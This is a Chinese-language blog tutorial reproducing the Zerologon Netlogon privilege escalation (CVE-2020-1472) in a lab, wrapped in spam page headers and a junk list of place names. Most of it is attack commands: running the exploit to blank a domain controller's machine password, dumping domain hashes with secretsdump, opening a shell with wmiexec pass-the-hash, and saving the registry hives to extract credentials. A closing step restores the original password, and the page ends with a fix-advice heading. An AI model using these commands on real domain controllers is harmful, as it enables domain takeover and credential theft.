91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Netlogon特權提升漏洞CVE 2020-1472該如何復習

發布時間:2021-12-28 17:18:35 來源:億速云 閱讀:133 作者:柒染 欄目:安全技術

Netlogon特權提升漏洞CVE 2020-1472該如何復習,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

1.復現環境

DC:
os:windows 2012 server
ip:192.168.236.132

攻擊機:
os:kali
ip:192.168.236.130

2.影響版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控環境搭建參考文章

sectool/251828.html

4.復現過程

4.1 漏洞驗證

POC鏈接

Netlogon特權提升漏洞CVE 2020-1472該如何復習

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2 漏洞利用

安裝最新的Impacket,否則會報錯

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.1 下載攻擊exp

EXP下載

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.2 置空密碼

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.3 獲取hash

進入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.4 獲取shell

python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.5 獲取原hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 恢復hash

恢復鏈接

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.8 驗證是否恢復

使用獲取hash的命令來驗證是否恢復

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Netlogon特權提升漏洞CVE 2020-1472該如何復習

5.修復建議

官方修復建議

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

五原县| 台中县| 南京市| 沁水县| 阳信县| 资阳市| 开封市| 漳平市| 枣庄市| 辽中县| 达州市| 象山县| 宜川县| 颍上县| 长顺县| 镶黄旗| 汝阳县| 六安市| 蕉岭县| 中江县| 光山县| 伽师县| 闽侯县| 南部县| 天镇县| 尉氏县| 三门峡市| 固始县| 凤山县| 余庆县| 泸水县| 施甸县| 诏安县| 横山县| 定安县| 四会市| 新昌县| 永昌县| 资兴市| 基隆市| 茌平县|